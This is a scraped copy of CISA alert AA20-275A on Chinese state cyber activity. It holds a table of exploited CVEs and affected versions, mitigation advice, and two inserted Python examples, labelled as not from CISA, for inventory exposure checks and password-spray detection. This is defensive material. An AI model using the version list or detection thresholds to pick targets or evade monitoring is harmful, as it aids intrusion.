* [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>)
[CVE-2020-8196](<https://nvd.nist.gov/vuln/detail/CVE-2020-8196>) |
* Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18
* Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7
|
* [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>)
[CVE-2019-0708](<https://nvd.nist.gov/vuln/detail/CVE-2019-0708>) |
* Windows 7 for 32-bit Systems Service Pack 1
* Windows 7 for x64-based Systems Service Pack 1
* Windows Server 2008 for 32-bit Systems Service Pack 2
* Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
* Windows Server 2008 for Itanium-Based Systems Service Pack 2
* Windows Server 2008 for x64-based Systems Service Pack 2
* Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
* Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
|
* [Microsoft Security Advisory for CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)
[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) |
* MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0
* Sentry versions 9.7.2 and earlier, and 9.8.0
* Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier
|
* [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)
[CVE-2020-1350](<https://nvd.nist.gov/vuln/detail/CVE-2020-1350>) |
* Windows Server 2008 for 32-bit Systems Service Pack 2
* Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
* Windows Server 2008 for x64-based Systems Service Pack 2
* Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
* Windows Server 2008 R2 for x64-based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
* Windows Server 2012
* Windows Server 2012 (Server Core installation)
* Windows Server 2012 R2
* Windows Server 2012 R2 (Server Core installation)
* Windows Server 2016
* Windows Server 2016 (Server Core installation)
* Windows Server 2019
* Windows Server 2019 (Server Core installation)
* Windows Server, version 1903 (Server Core installation)
* Windows Server, version 1909 (Server Core installation)
* Windows Server, version 2004 (Server Core installation)
|
* [Microsoft Security Advisory for CVE-2020-1350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1350>)
[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) |
* Windows Server 2008 R2 for x64-based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
* Windows Server 2012
* Windows Server 2012 (Server Core installation)
* Windows Server 2012 R2
* Windows Server 2016
* Windows Server 2019
* Windows Server 2019 (Server Core installation)
* Windows Server, version 1903 (Server Core installation)
* Windows Server, version 1909 (Server Core installation)
* Windows Server, version 2004 (Server Core installation)
|
* [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)
[CVE-2020-1040](<https://nvd.nist.gov/vuln/detail/CVE-2020-1040>) |
* Windows Server 2008 R2 for x64-based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
* Windows Server 2012
* Windows Server 2012 (Server Core installation)
* Windows Server 2012 R2
* Windows Server 2012 R2 (Server Core installation)
* Windows Server 2016
* Windows Server 2016 (Server Core installation)
|
* [Microsoft Security Advisory for CVE-2020-1040](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1040>)
[CVE-2018-6789](<https://nvd.nist.gov/vuln/detail/CVE-2018-6789>) |
* Exim before 4.90.1
|
* [Exim page for CVE-2018-6789](<https://exim.org/static/doc/security/CVE-2018-6789.txt>)
* [Exim patch information for CVE-2018-6789](<https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1>)
[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) |
* Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
* Microsoft Exchange Server 2013 Cumulative Update 23
* Microsoft Exchange Server 2016 Cumulative Update 14
* Microsoft Exchange Server 2016 Cumulative Update 15
* Microsoft Exchange Server 2019 Cumulative Update 3
* Microsoft Exchange Server 2019 Cumulative Update 4
|
* [Microsoft Security Advisory for CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)
[CVE-2018-4939](<https://nvd.nist.gov/vuln/detail/CVE-2018-4939>) |
* ColdFusion 2016 Update 5 and earlier versions
* ColdFusion 11 Update 13 and earlier versions
|
* [Adobe Security Bulletin APSB18-14](<https://helpx.adobe.com/security/products/coldfusion/apsb18-14.html>)
[CVE-2015-4852](<https://nvd.nist.gov/vuln/detail/CVE-2015-4852>) |
* Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0
|
* [Oracle Critical Patch Update Advisory - October 2016](<https://www.oracle.com/security-alerts/cpuoct2016.html>)
[CVE-2020-2555](<https://nvd.nist.gov/vuln/detail/CVE-2020-2555>) |
* Oracle Coherence product of Oracle Fusion Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0
|
* [Oracle Critical Patch Update Advisory - January 2020](<https://www.oracle.com/security-alerts/cpujan2020.html>)
[CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) |
* Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3, and from version 6.14.0 before 6.14.2
|
* [Jira Atlassian Confluence Server and Data Center: Remote code execution via Widget Connector macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)
[CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) |
* Atlassian Crowd and Crowd Data Center from version 2.1.0 before 3.0.5, from version 3.1.0 before 3.1.6, from version 3.2.0 before 3.2.8, from version 3.3.0 before 3.3.5, and from version 3.4.0 before 3.4.4
|
* [Jira Atlassian Crowd: Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)
[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) |
* Zoho ManageEngine Desktop Central before 10.0.474
|
* [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>)
[CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) |
* Progress Telerik UI for ASP.NET AJAX through 2019.3.1023
|
* [Telerik: ASP.NET AJAX: Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)
[CVE-2020-0601](<https://nvd.nist.gov/vuln/detail/CVE-2020-0601>) |
* Windows 10 for 32-bit Systems
* Windows 10 for x64-based Systems
* Windows 10 Version 1607 for 32-bit Systems
* Windows 10 Version 1607 for x64-based Systems
* Windows 10 Version 1709 for 32-bit Systems
* Windows 10 Version 1709 for ARM64-based Systems
* Windows 10 Version 1709 for x64-based Systems
* Windows 10 Version 1803 for 32-bit Systems
* Windows 10 Version 1803 for ARM64-based Systems
* Windows 10 Version 1803 for x64-based Systems
* Windows 10 Version 1809 for 32-bit Systems
* Windows 10 Version 1809 for ARM64-based Systems
* Windows 10 Version 1809 for x64-based Systems
* Windows 10 Version 1903 for 32-bit Systems
* Windows 10 Version 1903 for ARM64-based Systems
* Windows 10 Version 1903 for x64-based Systems
* Windows 10 Version 1909 for 32-bit Systems
* Windows 10 Version 1909 for ARM64-based Systems
* Windows 10 Version 1909 for x64-based Systems
* Windows Server 2016
* Windows Server 2016 (Server Core installation)
* Windows Server 2019
* Windows Server 2019 (Server Core installation)
* Windows Server, version 1803 (Server Core Installation)
* Windows Server, version 1903 (Server Core installation)
* Windows Server, version 1909 (Server Core installation)
|
* [Microsoft Security Advisory for CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>)
[CVE-2019-0803](<https://nvd.nist.gov/vuln/detail/CVE-2019-0803>) |
* Windows 10 for 32-bit Systems
* Windows 10 for x64-based Systems
* Windows 10 Version 1607 for 32-bit Systems
* Windows 10 Version 1607 for x64-based Systems
* Windows 10 Version 1703 for 32-bit Systems
* Windows 10 Version 1703 for x64-based Systems
* Windows 10 Version 1709 for 32-bit Systems
* Windows 10 Version 1709 for ARM64-based Systems
* Windows 10 Version 1709 for x64-based Systems
* Windows 10 Version 1803 for 32-bit Systems
* Windows 10 Version 1803 for ARM64-based Systems
* Windows 10 Version 1803 for x64-based Systems
* Windows 10 Version 1809 for 32-bit Systems
* Windows 10 Version 1809 for ARM64-based Systems
* Windows 10 Version 1809 for x64-based Systems
* Windows 7 for 32-bit Systems Service Pack 1
* Windows 7 for x64-based Systems Service Pack 1
* Windows 8.1 for 32-bit systems
* Windows 8.1 for x64-based systems
* Windows RT 8.1
* Windows Server 2008 for 32-bit Systems Service Pack 2
* Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
* Windows Server 2008 for Itanium-Based Systems Service Pack 2
* Windows Server 2008 for x64-based Systems Service Pack 2
* Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
* Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1
* Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
* Windows Server 2012
* Windows Server 2012 (Server Core installation)
* Windows Server 2012 R2
* Windows Server 2012 R2 (Server Core installation)
* Windows Server 2016
* Windows Server 2016 (Server Core installation)
* Windows Server 2019
* Windows Server 2019 (Server Core installation)
* Windows Server, version 1803 (Server Core Installation)
|
* [Microsoft Security Advisory for CVE-2019-0803](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803>)
[CVE-2017-6327](<https://nvd.nist.gov/vuln/detail/CVE-2017-6327>) |
* Symantec Messaging Gateway before 10.6.3-267
|
* [Broadcom Security Updates Detail for CVE-2017-6327 and CVE-2017-6328](<https://www.broadcom.com/support/security-center/securityupdates/detail?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00>)
[CVE-2020-3118](<https://nvd.nist.gov/vuln/detail/CVE-2020-3118>) |
* ASR 9000 Series Aggregation Services Routers
* Carrier Routing System (CRS)
* IOS XRv 9000 Router
* Network Convergence System (NCS) 540 Series Routers
* NCS 560 Series Routers
* NCS 1000 Series Routers
* NCS 5000 Series Routers
* NCS 5500 Series Routers
* NCS 6000 Series Routers
|
* [Cisco Security Advisory cisco-sa-20200205-iosxr-cdp-rce](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>)
[CVE-2020-8515](<https://nvd.nist.gov/vuln/detail/CVE-2020-8515>) |
* DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices
|
* [Draytek Security Advisory: Vigor3900 / Vigor2960 / Vigor300B Router Web Management Page Vulnerability (CVE-2020-8515)](<https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-\(cve-2020-8515\)/>)
2. **Implement rigorous configuration management programs.** Audit configuration management programs to ensure they can track and mitigate emerging threats. Review system configurations for misconfigurations and security weaknesses. Implementing a robust configuration and patch management program hinders sophisticated APT operations by limiting the effectiveness of opportunistic attacks.
3. **Disable unnecessary ports, protocols, and services.** Review network security device logs and determine whether to shut off unnecessary ports and protocols. Monitor common ports and protocols for C2 activity. Turn off or disable any unnecessary services or functionality within devices (e.g., universal plug and play [UPnP], PowerShell).
4. **Enhance monitoring of network and email traffic.** Review network signatures and indicators for focused operations activities, monitor for new phishing themes, and adjust email rules accordingly. Follow best practices of restricting attachments via email. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse.
5. **Use protection capabilities to stop malicious activity.** Implement antivirus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use network intrusion detection and prevention systems to identify and prevent commonly employed adversarial malware and limit nefarious data transfers.
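The affected-version ranges in Table 4 are worded several ways ("before X", "X and earlier", "through X", "from A before B", explicit version lists), and a patch management program of the kind item 2 calls for needs those wordings turned into something that can be run against an inventory. The following is an added example, not code from the CISA alert: it encodes a subset of Table 4's rows as range rules and evaluates a software inventory against them. The product keys, the `SAMPLE_INVENTORY` hosts and their versions are assumptions constructed for the example.

```python
"""Added example, not from the CISA alert: evaluate a software inventory against
affected-version ranges worded the way Table 4 words them."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, ...]


def parse_version(text: str) -> Version:
    """'6.13.3' -> (6, 13, 3); '10.6.3-267' -> (10, 6, 3, 267); '1.4.4_Beta' -> (1, 4, 4).
    Non-numeric suffixes are dropped, so pre-release tags are not ordered."""
    nums = re.findall(r"\d+", text)
    if not nums:
        raise ValueError(f"no numeric version component in {text!r}")
    return tuple(int(n) for n in nums)


def _padded(a: Version, b: Version) -> Tuple[Version, Version]:
    """Right-pad with zeros so that 6.13 compares equal to 6.13.0."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def lt(a: Version, b: Version) -> bool:
    a, b = _padded(a, b)
    return a < b


def le(a: Version, b: Version) -> bool:
    a, b = _padded(a, b)
    return a <= b


def eq(a: Version, b: Version) -> bool:
    a, b = _padded(a, b)
    return a == b


@dataclass(frozen=True)
class Range:
    low: Optional[str] = None      # inclusive lower bound ("from version A"), None = unbounded
    high: Optional[str] = None     # upper bound ("before B"), None = unbounded
    high_inclusive: bool = False   # True for "B and earlier" / "through B"

    def contains(self, v: Version) -> bool:
        if self.low is not None and lt(v, parse_version(self.low)):
            return False
        if self.high is not None:
            h = parse_version(self.high)
            return le(v, h) if self.high_inclusive else lt(v, h)
        return True


@dataclass(frozen=True)
class Rule:
    cve: str
    ranges: Tuple[Range, ...] = ()
    exact: Tuple[str, ...] = ()    # explicitly listed versions, e.g. MobileIron's 10.4.0.x

    def matches(self, v: Version) -> bool:
        return any(r.contains(v) for r in self.ranges) or any(
            eq(v, parse_version(e)) for e in self.exact)


# Product keys are an assumption for this example; the ranges are transcribed from
# the wording of Table 4 (a subset of its rows).
RULES: Dict[str, Rule] = {
    "exim": Rule("CVE-2018-6789", ranges=(Range(high="4.90.1"),)),
    "confluence-server": Rule("CVE-2019-3396", ranges=(
        Range(high="6.6.12"), Range("6.7.0", "6.12.3"),
        Range("6.13.0", "6.13.3"), Range("6.14.0", "6.14.2"))),
    "crowd": Rule("CVE-2019-11580", ranges=(
        Range("2.1.0", "3.0.5"), Range("3.1.0", "3.1.6"), Range("3.2.0", "3.2.8"),
        Range("3.3.0", "3.3.5"), Range("3.4.0", "3.4.4"))),
    "desktop-central": Rule("CVE-2020-10189", ranges=(Range(high="10.0.474"),)),
    "telerik-ui-ajax": Rule("CVE-2019-18935",
                            ranges=(Range(high="2019.3.1023", high_inclusive=True),)),
    "mobileiron-core": Rule("CVE-2020-15505",
                            ranges=(Range(high="10.3.0.3", high_inclusive=True),),
                            exact=("10.4.0.0", "10.4.0.1", "10.4.0.2", "10.4.0.3",
                                   "10.5.1.0", "10.5.2.0", "10.6.0.0")),
}


def exposure(inventory: List[Tuple[str, str, str]]) -> List[Tuple[str, str]]:
    """Rows are (host, product key, version). Returns (host, CVE) for each row inside an
    affected range. Products without a rule are skipped, which means 'unknown', not 'safe'."""
    hits = []
    for host, product, version in inventory:
        rule = RULES.get(product)
        if rule is not None and rule.matches(parse_version(version)):
            hits.append((host, rule.cve))
    return hits


# Constructed sample inventory; hosts and versions are made up for the example.
SAMPLE_INVENTORY = [
    ("mail-01", "exim", "4.89"), ("mail-02", "exim", "4.90.1"),
    ("wiki-01", "confluence-server", "6.13.1"), ("wiki-02", "confluence-server", "6.13.3"),
    ("sso-01", "crowd", "3.2.7"), ("sso-02", "crowd", "3.0.5"),
    ("mdm-01", "mobileiron-core", "10.4.0.2"), ("mdm-02", "mobileiron-core", "10.6.0.1"),
    ("dc-01", "desktop-central", "10.0.473"),
    ("web-01", "telerik-ui-ajax", "2019.3.1023"), ("web-02", "telerik-ui-ajax", "2020.1.114"),
]

if __name__ == "__main__":
    for host, cve in exposure(SAMPLE_INVENTORY):
        print(f"{host}: affected by {cve}")
```

Two points to keep in mind when extending this to the rest of Table 4: the boundary semantics differ per row ("before 6.13.3" excludes 6.13.3, while "through 2019.3.1023" includes it), and `parse_version` discards pre-release tags, so rows such as DrayTek's `1.4.4_Beta` need a stricter version scheme before they can be compared reliably.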
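Item 4 above asks for log data to be aggregated and correlated with a focus on account misuse. The following added example (not CISA's code) shows one such correlation over a constructed, flattened rendering of Windows Security events 4625 (failed logon) and 4624 (successful logon): a source that fails against many distinct accounts inside a short window is flagged as password spraying, and any later success from that source is surfaced for review first. The log line format, the thresholds and the IP addresses are assumptions made for the example; real input would come from the SIEM or from `Get-WinEvent`.

```python
"""Added example, not from the CISA alert: correlate logon events per source to
spot password spraying, which per-account lockout policy does not catch."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Assumed flattened log format for this example; Status is optional (absent on 4624).
LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event>\d+) TargetUserName=(?P<user>\S+) "
    r"IpAddress=(?P<ip>\S+)(?: Status=(?P<status>\S+))?$"
)


def parse_line(line: str) -> dict:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparsed log line: {line!r}")
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "event": int(m["event"]),
        "user": m["user"].lower(),
        "ip": m["ip"],
        "status": m["status"],
    }


def detect_spraying(lines: List[str], window: timedelta = timedelta(minutes=10),
                    min_users: int = 5) -> Dict[str, List[str]]:
    """Sources that failed (4625) against at least `min_users` distinct accounts within
    any `window`-long span. Many failures on one account is brute force, which lockout
    handles; one failure each on many accounts is a spray, which stays under every
    per-account lockout threshold and only shows up when events are correlated by source."""
    events = sorted((parse_line(ln) for ln in lines if ln.strip()), key=lambda e: e["ts"])
    failures: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for e in events:
        if e["event"] == 4625:
            failures[e["ip"]].append((e["ts"], e["user"]))
    flagged: Dict[str, List[str]] = {}
    for ip, attempts in failures.items():
        start = 0
        for end in range(len(attempts)):          # sliding window over time-ordered attempts
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            if len({u for _, u in attempts[start:end + 1]}) >= min_users:
                flagged[ip] = sorted({u for _, u in attempts})
                break
    return flagged


def successes_from_sprayers(lines: List[str],
                            flagged: Dict[str, List[str]]) -> List[Tuple[str, str]]:
    """Successful logons (4624) from a flagged source: the accounts to review first."""
    hits = set()
    for e in (parse_line(ln) for ln in lines if ln.strip()):
        if e["event"] == 4624 and e["ip"] in flagged:
            hits.add((e["ip"], e["user"]))
    return sorted(hits)


# Constructed sample (not real data): one spraying source, one single-account brute
# force, one ordinary mistyped password. Lines are deliberately not in time order.
SAMPLE_LOG = """
2020-10-01T13:00:01Z EventID=4625 TargetUserName=alice IpAddress=203.0.113.7 Status=0xC000006D
2020-10-01T13:00:31Z EventID=4625 TargetUserName=bob IpAddress=203.0.113.7 Status=0xC000006D
2020-10-01T13:01:02Z EventID=4625 TargetUserName=carol IpAddress=203.0.113.7 Status=0xC000006D
2020-10-01T13:01:33Z EventID=4625 TargetUserName=dave IpAddress=203.0.113.7 Status=0xC000006D
2020-10-01T13:02:04Z EventID=4625 TargetUserName=erin IpAddress=203.0.113.7 Status=0xC000006D
2020-10-01T13:02:35Z EventID=4625 TargetUserName=frank IpAddress=203.0.113.7 Status=0xC000006D
2020-10-01T13:40:10Z EventID=4624 TargetUserName=erin IpAddress=203.0.113.7
2020-10-01T13:05:00Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.9 Status=0xC000006D
2020-10-01T13:05:05Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.9 Status=0xC000006D
2020-10-01T13:05:10Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.9 Status=0xC000006D
2020-10-01T13:05:15Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.9 Status=0xC000006D
2020-10-01T13:05:20Z EventID=4625 TargetUserName=admin IpAddress=198.51.100.9 Status=0xC000006D
2020-10-01T13:06:00Z EventID=4625 TargetUserName=alice IpAddress=10.0.0.5 Status=0xC000006D
"""

if __name__ == "__main__":
    sprayers = detect_spraying(SAMPLE_LOG.splitlines())
    for ip, users in sprayers.items():
        print(f"spray from {ip}: {len(users)} accounts tried")
    for ip, user in successes_from_sprayers(SAMPLE_LOG.splitlines(), sprayers):
        print(f"review: {user} logged on from sprayer {ip}")
```

The window and account-count thresholds are starting points to tune against the environment's baseline (shared NAT egress addresses in particular raise the false-positive rate). Note that the single-account source `198.51.100.9` is not flagged here: that pattern is what the lockout policy in item 4's sibling recommendations exists for, while the spray is the case that only correlation across accounts reveals.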
### Contact Information
CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at:
* 1-888-282-0870 (From outside the United States: +1-703-235-8832)
* [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA homepage at <http://www.us-cert.cisa.gov/>.
### References
[[1] White House Publication: How China’s Economic Aggression Threatens the Technologies and Intellectual Property of the United States and the World ](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)
[[2] Congressional Research Services: 'Made in China 2025' Industrial Policies: Issues for Congress ](<https://fas.org/sgp/crs/row/IF10964.pdf>)
[[3] Council on Foreign Relations: Is ‘Made in China 2025’ a Threat to Global Trade ](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)
[[4] Mandiant: APT1 Exposing One of China’s Cyber Espionage Units ](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)
[[5] U.S. Department of Justice (DOJ) Press Release: U.S. Charges Five Chinese Military Hackers for Cyber Espionage Against U.S. Corporations and a Labor Organization for Commercial Advantage](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)
[[6] CISA Alert TA17-117A: Intrusions Affecting Multiple Victims Across Multiple Sectors](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)
[[7] DOJ Press Release: Deputy Attorney General Rod J. Rosenstein Announces Charges Against Chinese Hackers](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)
[[8] CISA Awareness Briefing: Chinese Cyber Activity Targeting Managed Service Providers](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)
[[9] DOJ Press Release: Attorney General William P. Barr Announces Indictment of Four Members of China’s Military for Hacking into Equifax](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)
[[10] CISA Press Release: FBI and CISA Warn Against Chinese Targeting of COVID-19 Research Organizations ](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)
[[11] CISA Alert AA20-126A: APT Groups Target Healthcare and Essential Services](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)
[[12] CISA Current Activity (CA): Chinese Malicious Cyber Activity](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity>)
[[13] FireEye Advanced Persistent Threat Groups](<https://www.fireeye.com/current-threats/apt-groups.html>)
[[14] MITRE ATT&CK: APT3](<https://attack.mitre.org/groups/G0022/>)
[[15] MITRE ATT&CK: APT19](<https://attack.mitre.org/groups/G0073/>)
[[16] MITRE ATT&CK: APT41](<https://attack.mitre.org/groups/G0096/>)
[[17] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)
[[18] CISA Alert AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)
[[19] CISA CA: F5 Releases Security Advisory for BIG-IP TMUI RCE Vulnerability, CVE-2020-5902](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)
[[20] CISA Alert AA20-133A: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>)
[[21] NSA Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)
### Revisions
* October 1, 2020: Initial Version
* October 20, 2020: Recommended Actions Section Updated
{"id": "AA20-275A", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Potential for China Cyber Response to Heightened U.S.\u2013China Tensions", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._\n\nIn light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation\u2019s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.\n\n 1. **Adopt a state of heightened awareness. **Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.\n 2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.\n 3. 
**Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization\u2019s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA\u2019s early warning system (see the Contact Information section below).\n 4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.\n\n### Technical Details\n\n#### China Cyber Threat Profile\n\nChina has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The \u201cMade in China 2025\u201d 10-year plan outlines China\u2019s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.\n\nThe U.S. 
Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People\u2019s Liberation Army (PLA) and Ministry of State Security (MSS) as driving forces behind Chinese state-sponsored cyberattacks\u2013either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of their activities to secure information critical to advancing their economic prowess and competitive advantage.\n\n#### Chinese Cyber Activity\n\nAccording to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.\n\nAdditionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. 
